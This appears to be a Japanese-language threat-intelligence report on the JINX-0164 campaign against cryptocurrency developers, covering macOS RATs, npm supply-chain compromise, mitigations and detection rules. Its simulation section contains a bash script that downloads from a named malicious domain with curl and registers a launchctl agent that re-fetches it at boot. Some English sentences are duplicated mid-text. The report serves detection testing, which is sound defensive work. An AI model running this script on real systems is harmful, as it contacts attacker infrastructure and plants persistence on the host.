フォローする 
概要
JINX-0164として追跡される財務動機のある脅威アクターが、LinkedInのソーシャルエンジニアリング、macOSマルウェア、CI/CDの妥協を通じて暗号通貨開発者を標的にしています。このグループは、AUDIOFIXとして知られるカスタムPython RATと、MINIRATというGoベースのバックドアを展開しており、いずれもハードコードされたコマンド&コントロールドメインと通信するように設定されています。アクセスを得た後、攻撃者はクラウドや開発の資格情報を盗み、コードリポジトリを改ざんし、さらには悪意のあるnpmパッケージを公開してアクセスを拡大し、暗号通貨の盗難を可能にします。このキャンペーンは、ソフトウェア開発ライフサイクルを狙った高度なサプライチェーン脅威を反映しています。
調査
Wiz CIRTは、最初のLinkedInの勧誘から悪意のあるリンクの配信、macOSペイロードの実行、資格情報の盗難、およびソースコードリポジトリへの横方向移動まで侵入を追跡しました。彼らの調査により、ドロッパースクリプト、持続性の維持に関与する launchctl、および秘密の漏洩に使用される nord-stream ツールが発見されました。研究者たちはまた、複数の偽装ドメイン、VPN出口ノード、@velora-dex/sdk npmパッケージを巻き込んだサプライチェーンの妥協も特定しました。ファイルパス、ハッシュ、ドメイン、およびIPアドレスは、検出と脅威のハンティングをサポートするために収集されました。 @velora-dex/sdk npm package. File paths, hashes, domains, and IP addresses were collected to support detection and threat hunting.
軽減策
推奨される防御策には、macOSシステムの持続性の監視、疑わしいLaunchAgentsの検出、既知の悪意のあるドメインやコマンド&コントロールサーバーのブロックが含まれます。組織は署名付きコミットを施行し、GitHub Vigilant Modeを有効にし、未確認のコミットや異常なCI/CDワークフローの変更に注意を払うべきです。VPNの使用は承認されたプロバイダーに制限され、クラウドアカウントや開発プラットフォームにはMFAが必要とされるべきです。 launchctl persistence, detecting suspicious LaunchAgents, and blocking the known malicious domains and command-and-control servers. Organizations should enforce signed commits, enable GitHub Vigilant Mode, and watch for unverified commits or unusual CI/CD workflow changes. VPN use should be limited to approved providers, and MFA should be required for cloud accounts and development platforms.
対応
この活動が検出された場合、影響を受けたmacOSシステムを直ちに隔離し、フォレンジックアーティファクトを収集し、妥協した資格情報およびAPIトークンを取り消すべきです。セキュリティチームは、悪意のあるコミットのためにコードリポジトリを徹底的にレビューし、妥協したnpmパッケージを削除する必要があります。特定されたコマンド&コントロールドメインはブロックされ、悪意のあるIPアドレスへのトラフィックを拒否するようにファイアウォールルールが更新されるべきです。関連する利害関係者に通知し、信頼できる業界パートナーとの脅威インテリジェンスの共有を検討するべきです。
攻撃の流れ
この部分を更新中です。通知を受け取るためにサインアップしてください
通知する検出
疑わしいファイルのダウンロード直接IP(プロキシ経由)
表示
可能なIPルックアップドメイン通信試行(DNS経由)
表示
MacOS launchctl実行試行(コマンドライン経由)
表示
単一のコマンドでchmodとnohupを使用した可能性のある実行(コマンドライン経由)
表示
Base64エンコード文字列の操作の可能性[MacOS](コマンドライン経由)
表示
疑わしいcurl実行試行[MacOS](コマンドライン経由)
表示
検出するためのIOCs(HashSha256):暗号通貨産業のソフトウェア開発インフラストラクチャを標的にした新たな脅威アクター
表示
検出するためのIOCs(SourceIP):暗号通貨産業のソフトウェア開発インフラストラクチャを標的にした新たな脅威アクター
表示
検出するためのIOCs(DestinationIP):暗号通貨産業のソフトウェア開発インフラストラクチャを標的にした新たな脅威アクター
表示
AUDIOFIXマルウェアの持続性とペイロードダウンロードの検出[Linuxプロセス作成]
表示
シミュレーション実行
前提条件:テレメトリ&ベースライン事前チェックが合格している必要があります。
根拠:このセクションは、検出ルールをトリガーするために設計された敵の技術(TTP)の正確な実行を詳細に説明します。コマンドと物語は、識別されたTTPを直接反映し、検出ロジックによって期待される正確なテレメトリを生成することを目的としています。
-
攻撃の物語&コマンド:
- 最初の足場: 攻撃者は悪意のあるリンクを含むフィッシングメールを配信します(T1566.004)。被害者はリンクをクリックし、それは
https://apple.driver-update.io/troubleshoot/mac/audio-issue-fix.sh. - ペイロードのダウンロード: 被害者のターミナルが
curlコマンドを実行し、スクリプトを静かに取得します。 - 持続性のセットアップ: スクリプトは
launchctl submitを使用してローンチエージェントを登録し、同じcurlコマンドを埋め込むことで、ペイロードが各起動時に再ダウンロードされるようにします(T1546.006)。 - 実行: ローンチエージェントは、システム権限で実行し、ダウンロードされたスクリプトを実行してホストを妥協させます。
- 最初の足場: 攻撃者は悪意のあるリンクを含むフィッシングメールを配信します(T1566.004)。被害者はリンクをクリックし、それは
-
回帰テストスクリプト: (テストmacOSマシンで実行;管理者権限が必要)
#!/bin/bash set -euo pipefail # 1. 悪意のあるcurlダウンロードをシミュレートする(実際の悪意のあるコードなし) MALICIOUS_URL="https://apple.driver-update.io/troubleshoot/mac/audio-issue-fix.sh" curl -fsSL "$MALICIOUS_URL" -o /tmp/audio-fix.sh # 2. 起動時にスクリプトを再ダウンロードするローンチエージェントを登録する launchctl submit -l com.malicious.audiofix -p /usr/bin/curl -a -c -t "30" /usr/bin/curl -fsSL "$MALICIOUS_URL" -o /tmp/audio-fix.sh echo "悪意のあるローンチエージェントが登録されました。SIEMで検出を確認してください。" -
クリーンアップコマンド:
# ローンチエージェントを削除します launchctl remove com.malicious.audiofix || true # ダウンロードされたスクリプトを削除します rm -f /tmp/audio-fix.sh echo "クリーンアップ完了。"
レポートの終了